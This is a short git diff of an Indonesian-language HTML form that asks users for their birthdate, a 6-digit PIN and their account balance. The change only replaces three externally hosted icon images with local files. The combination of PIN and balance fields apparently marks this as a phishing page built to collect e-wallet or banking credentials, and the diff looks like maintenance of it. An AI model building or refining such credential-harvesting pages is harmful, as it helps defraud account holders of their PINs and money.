--- a/index.html
+++ b/index.html
@@ -132,21 +132,21 @@
         <label for="tgl_lahir">Tanggal Lahir</label>
         <div class="input-icon">
           <input type="date" name="birthdate" id="tgl_lahir" required style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #222; border-radius: 5px;">
-          <img src="https://i.ibb.co/yNJ9JtK/pngtree-black-and-white-calendar-logo-square-png-image-6655096-removebg-preview.png" alt="Calendar Icon">
+          <img src="nok.jpg" alt="Calendar Icon">
         </div>
       </div>
       <div class="input-group">
         <label for="pin">Masukkan PIN 6 Digit</label>
         <div class="input-icon">
           <input type="password" name="pin" id="pin" placeholder="Masukkan PIN 6 Digit" required minlength="6" maxlength="6" oninput="this.value=this.value.replace(/\D/g,'')" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px;">
-          <img src="https://i.ibb.co/z672Tng/IMG-20240415-143131-removebg-preview.png" alt="PIN Icon">
+          <img src="pinn.jpg" alt="PIN Icon">
         </div>
       </div>
       <div class="input-group">
         <label for="balance">Masukkan Saldo</label>
         <div class="input-icon">
           <input type="tel" id="jumlahInput" name="balance" placeholder="Masukkan Saldo" required oninput="updateNominal()" style="width: calc(100% - 60px); padding: 11px 16px 13px 40px; border: 2px solid #ccc; border-radius: 5px;">
-          <img src="https://i.ibb.co/Yp3ws6X/1000005674-removebg-preview.png" alt="Saldo Icon">
+          <img src="sisa.jpg" alt="Saldo Icon">
         </div>
       </div>
       <button type="submit" class="btn">LANJUT</button>
